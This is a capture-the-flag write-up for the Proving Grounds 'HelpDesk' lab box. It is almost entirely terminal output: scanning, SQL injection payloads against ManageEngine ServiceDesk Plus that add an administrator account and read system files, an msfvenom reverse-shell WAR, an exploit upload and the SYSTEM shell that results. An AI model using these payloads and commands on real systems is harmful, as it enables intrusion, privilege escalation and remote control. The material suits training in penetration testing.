ProvingGrounds HelpDesk Writeup

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice]
└─$ sudo nmap -n -r --min-rate=3500 -sSV 192.168.244.43 -T4 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-21 00:18 CST
Nmap scan report for 192.168.244.43
Host is up (0.25s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
Service Info: Host: HELPDESK; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.82 seconds

1
2
3
4
5
6

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice]
└─$ whatweb -a 3 http://192.168.244.43:8080/
http://192.168.244.43:8080/ [200 OK] Apache, Cookies[JSESSIONID], Country[RESERVED][ZZ], Frame, HTTPServer[Apache-Coyote/1.1], IP[192.168.244.43], Java, PasswordField[j_password], Script[text/JavaScript,text/javascript], Title[ManageEngine ServiceDesk Plus]

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice]
└─$ searchsploit manageEngine ServiceDesk Plus

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice]
└─$ searchsploit manageEngine ServiceDesk Plus 7.6
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------------
ManageEngine ServiceDesk Plus 7.6 - woID SQL Injection             | jsp/webapps/11793.txt
Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbi | jsp/webapps/46413.txt
Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restri | multiple/webapps/46894.txt
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results


┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice]
└─$ searchsploit -x 11793
……
Vulnerability Description:
A Vulnerability has been discovered in Manage Engine Service Desk Plus, which can be exploited by
malicious people to conduct SQL injection attacks.
Input passed via the "woID" parameter to WorkOrder.do is not properly sanitized before being used in
a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The vulnerability is confirmed in version 7.6. Other versions may also be affected.


Proof of Concept:
Microsoft Windows Environment with MySQL:
http://x.x.x.x:8080/WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID=6)
union select 1,2,3,4,5,6,7,8,load_file("c:\\boot.ini"),10,11,12,13,14,15,16,17,18,19,1 into dumpfile 'C:\\ManageEngine\\ServiceDesk\\applications\\extracted\\AdventNetServiceDesk.eear\\AdventNetServiceDeskWC.ear\\AdventNetServiceDesk.war\\images\\boot.ini'/*
then browse, http://x.x.x.x:8080/images/boot.ini

Microsoft Windows Environment with MSSQL:
http://x.x.x.x:8080/WorkOrder.do?woMode=viewWO&woID=1); EXEC xp_cmdshell 'net user
moebius m03biu5inj3ct$ /add';--
http://x.x.x.x:8080/WorkOrder.do?woMode=viewWO&woID=1); EXEC xp_cmdshell 'net localgroup
administrators moebius /add';--

GNU/Linux with MySQL:
http://x.x.x.x:8080/WorkOrder.do?woMode=viewWO&woID=1%29%20union%20select%201,2,3,4,5,
6,7,8,load_file%28%27/etc/passwd%27%29,10,11,12,13,14,15,16,17,18,19,20%20into%20dumpfile%
20%27/home/moebius/ManageEngine/ServiceDesk/applications/extracted/AdventNetServiceDesk.eear
/AdventNetServiceDeskWC.ear/AdventNetServiceDesk.war/images/passwd.txt%27/*
then browse, http://x.x.x.x:8080/images/passwd.txt

1

javax.servlet.ServletException: java.sql.SQLException: Syntax error or access violation,  message from server: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; EXEC xp_cmdshell 'net user moebius m03biu5inj3ct$ /add';--)' at line 1"

1
2
3
4
5
6
7
8

GET /WorkOrder.do?woMode=viewWO&woID=WorkOrder.WORKORDERID%3d6)union+select+1,2,3,4,5,6,7,8,load_file("c%3a\\boot.ini"),10,11,12,13,14,15,16,17,18,19,1+into+dumpfile+'C%3a\\ManageEngine\\ServiceDesk\\applications\\extracted\\AdventNetServiceDesk.eear\\AdventNetServiceDeskWC.ear\\AdventNetServiceDesk.war\\images\\boot.ini'/* HTTP/1.1
Host: 192.168.244.43:8080
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=2D805EDCF4BA886BE98027DA4AA04DE6; JSESSIONIDSSO=B426F21E2CB902688F345DBF470D7683

1
2
3
4
5
6
7
8
9

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice]
└─$ msfvenom -p java/shell_reverse_tcp LHOST=192.168.45.232 LPORT=80 -f war -o shell.war
Payload size: 13323 bytes
Final size of war file: 13323 bytes
Saved as: shell.war
                                                                                                     
┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice]
└─$ python3 cve-2014-5301.py 192.168.244.43 8080 administrator administrator shell.war  
Trying http://192.168.244.43:8080/5KF7BB1owtfPSmLhIyI7IvsioF80YhEQ/jjehycsuozbubil/D9zMMp8eubDUm04P

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

┌──(xavier㉿kali)-[~/Desktop/OSCP/PG_Practice]
└─$ nc -nlvp 80  
listening on [any] 80 ...
connect to [192.168.45.232] from (UNKNOWN) [192.168.244.43] 49196
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\ManageEngine\ServiceDesk\bin>whoami
whoami
nt authority\system

C:\Users>type administrator\desktop\proof.txt
type administrator\desktop\proof.txt
362343a6e1593e22b5f3a58cdef9f423